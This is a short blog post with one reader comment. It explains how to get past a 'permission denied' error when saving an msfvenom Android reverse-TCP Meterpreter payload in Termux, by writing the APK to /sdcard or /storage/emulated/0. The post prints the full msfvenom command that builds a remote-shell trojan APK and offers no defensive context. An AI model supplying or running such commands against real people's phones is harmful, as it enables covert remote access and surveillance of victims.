Home termux problem solving Metasploit payload creating permission denied in termux

Metasploit payload creating permission denied in termux

Hello guy’s in this article we are going to discuss about how to solve metasploit payload creation permissions denied problem.

If you use termux application means definitely you use metasploit package most of the people successfully make payloads but some people get this error.

msfvenom -p android/meterpreter/reverse_tcp LHOST= ip
LPORT=4444 R > /storage/errorsfind.apk

This above command we’ve use to make android payload most of the time this command did not make any error but some time get this blow error.

base: /storage/errorsfind.apk: permission denied 

Solution

The solution is very simple The storage directory is requires root access so type location of apk command this below

/storage/emulated/0/errorsfind.apk

The alternate simple command is 

/sdcard/errorsfind.apk 

x

1 Comment

  1. bro when i tried to make a payload after selecting payload, lhost and lport it is giving this error:PLEASE WAIT MSFCONSOLE STARTING….
    ruby: “No such file or directory — /data/data/com.termux/files/home/metasploit-framework/msfconsole (LoadError) “and if write msfconsole termux said that there in no command in dictionary please help me

Leave A Reply

Please enter your comment!
Please enter your name here